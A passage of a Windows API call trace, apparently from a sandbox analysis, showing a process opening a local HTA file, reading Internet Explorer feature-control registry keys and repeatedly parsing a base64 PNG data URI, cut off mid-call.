[0227.725] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.725] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.725] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.725] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.726] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.726] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.726] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.726] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.726] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.733] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", ppu=0x1ed3f0 | out: ppu=0x1ed3f0) returned 0x0 [0227.733] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed38c | out: phkResult=0x1ed38c*=0x258) returned 0x0 [0227.734] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed390 | out: phkResult=0x1ed390*=0x25c) returned 0x0 [0227.734] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed34c | out: phkResult=0x1ed34c*=0x0) returned 0x2 [0227.734] RegOpenKeyExW (in: hKey=0x258, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x1ed34c | out: phkResult=0x1ed34c*=0x0) returned 0x2 [0227.734] RegCloseKey (hKey=0x0) returned 0x6 [0227.734] RegCloseKey (hKey=0x0) returned 0x6 [0227.734] RegCloseKey (hKey=0x258) returned 0x0 [0227.734] RegCloseKey (hKey=0x25c) returned 0x0 [0227.734] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ed3f0 | out: ppURI=0x1ed3f0*=0x5bd34c) returned 0x0 [0227.734] ParseURLW (in: pcszURL="file:///C:/info.hta", ppu=0x1ed280 | out: ppu=0x1ed280) returned 0x0 [0227.734] CreateUri (in: pwzURI="file:///C:/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x1ed33c | out: ppURI=0x1ed33c*=0x5bbf0c) returned 0x0 [0227.734] IUnknown:QueryInterface (in: This=0x5bbf0c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed304 | out: ppvObject=0x1ed304*=0x5bbf0c) returned 0x0 [0227.734] IUnknown:Release (This=0x5bbf0c) returned 0xd [0227.735] IUnknown:AddRef (This=0x5bbf0c) returned 0xe [0227.735] CoInternetCombineIUri (in: pBaseUri=0x5bbf0c, pRelativeUri=0x5bd34c, dwCombineFlags=0x6000000, ppCombinedUri=0x1ed370, dwReserved=0x0 | out: ppCombinedUri=0x1ed370*=0x5bd34c) returned 0x0 [0227.735] IUnknown:Release (This=0x5bbf0c) returned 0xd [0227.735] IUnknown:Release (This=0x5bbf0c) returned 0xc [0227.735] IUnknown:QueryInterface (in: This=0x5bd34c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed2c4 | out: ppvObject=0x1ed2c4*=0x5bd34c) returned 0x0 [0227.735] IUnknown:Release (This=0x5bd34c) returned 0x3 [0227.735] IUnknown:AddRef (This=0x5bd34c) returned 0x4 [0227.735] IUri:GetAbsoluteUri (in: This=0x5bd34c, pbstrAbsoluteUri=0x1ed2b8 | out: pbstrAbsoluteUri=0x1ed2b8*="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=") returned 0x0 [0227.735] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xf4) returned 0x606440 [0227.735] IUnknown:AddRef (This=0x5bd34c) returned 0x5 [0227.735] IUnknown:QueryInterface (in: This=0x5bd34c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ed28c | out: ppvObject=0x1ed28c*=0x5bd34c) returned 0x0 [0227.735] IUnknown:Release (This=0x5bd34c) returned 0x5 [0227.735] IUnknown:AddRef (This=0x5bd34c) returned 0x6 [0227.735] IUri:GetScheme (in: This=0x5bd34c, pdwScheme=0x1ed2d8 | out: pdwScheme=0x1ed2d8*=0x0) returned 0x0 [0227.735] IUnknown:Release (This=0x5bd34c) returned 0x5 [0227.735] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4c) returned 0x5fc638 [0227.735] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x48) returned 0x5dd6d8 [0227.736] IInternetSecurityManager:MapUrlToZone (in: This=0x5c2540, pwszUrl="file:///C:/info.hta", pdwZone=0x1ed2d0, dwFlags=0x0 | out: pdwZone=0x1ed2d0*=0x0) returned 0x0 [0227.736] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x1b0) returned 0x606540 [0227.736] IUnknown:QueryInterface (in: This=0x5bd34c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ecfcc | out: ppvObject=0x1ecfcc*=0x5bd34c) returned 0x0 [0227.736] IUnknown:Release (This=0x5bd34c) returned 0x5 [0227.736] IUnknown:AddRef (This=0x5bd34c) returned 0x6 [0227.736] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", ppu=0x1ecf90 | out: ppu=0x1ecf90) returned 0x0 [0227.736] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x590000) returned 1 [0227.736] IUnknown:AddRef (This=0x5bd34c) returned 0x7 [0227.736] IUnknown:AddRef (This=0x5bd34c) returned 0x8 [0227.736] IUnknown:QueryInterface (in: This=0x5bd34c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ecfc0 | out: ppvObject=0x1ecfc0*=0x5bd34c) returned 0x0 [0227.736] IUnknown:Release (This=0x5bd34c) returned 0x8 [0227.736] IUnknown:AddRef (This=0x5bd34c) returned 0x9 [0227.736] IUri:GetScheme (in: This=0x5bd34c, pdwScheme=0x606648 | out: pdwScheme=0x606648*=0x0) returned 0x0 [0227.736] IUri:GetSchemeName (in: This=0x5bd34c, pbstrSchemeName=0x1ecfc0 | out: pbstrSchemeName=0x1ecfc0*="data") returned 0x0 [0227.736] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0227.736] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ecf40 | out: phkResult=0x1ecf40*=0x25c) returned 0x0 [0227.736] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x1ecf44 | out: phkResult=0x1ecf44*=0x258) returned 0x0 [0227.737] RegOpenKeyExW (in: hKey=0x258, lpSubKey="FEATURE_DATAURI", ulOptions=0x0, samDesired=0x1, phkResult=0x1ecf00 | out: phkResult=0x1ecf00*=0x0) returned 0x2 [0227.737] RegOpenKeyExW (in: hKey=0x25c, lpSubKey="FEATURE_DATAURI", ulOptions=0x0, samDesired=0x1, phkResult=0x1ecf00 | out: phkResult=0x1ecf00*=0x0) returned 0x2 [0227.737] RegCloseKey (hKey=0x0) returned 0x6 [0227.737] RegCloseKey (hKey=0x0) returned 0x6 [0227.737] RegCloseKey (hKey=0x25c) returned 0x0 [0227.737] RegCloseKey (hKey=0x258) returned 0x0 [0227.737] IUnknown:QueryInterface (in: This=0x5bd34c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x1ecfcc | out: ppvObject=0x1ecfcc*=0x5bd34c) returned 0x0 [0227.737] IUnknown:Release (This=0x5bd34c) returned 0x9 [0227.737] IUnknown:AddRef (This=0x5bd34c) returned 0xa [0227.737] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x10) returned 0x6060e8 [0227.737] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x1bc) returned 0x60b4c8 [0227.737] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x1ecf3c | out: ppURI=0x1ecf3c*=0x5bd34c) returned 0x0 [0227.737] IUri:GetSchemeName (in: This=0x5bd34c, pbstrSchemeName=0x1ecf1c | out: pbstrSchemeName=0x1ecf1c*="data") returned 0x0 [0227.737] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0227.737] IUri:GetPathAndQuery (in: This=0x5bd34c, pbstrPathAndQuery=0x1ecf48 | out: pbstrPathAndQuery=0x1ecf48*="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=") returned 0x0 [0227.737] IUnknown:Release (This=0x5bd34c) returned 0xa [0227.737] SysStringLen (param_1="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=") returned 0x5c1 [0227.745] CryptStringToBinaryW (in: 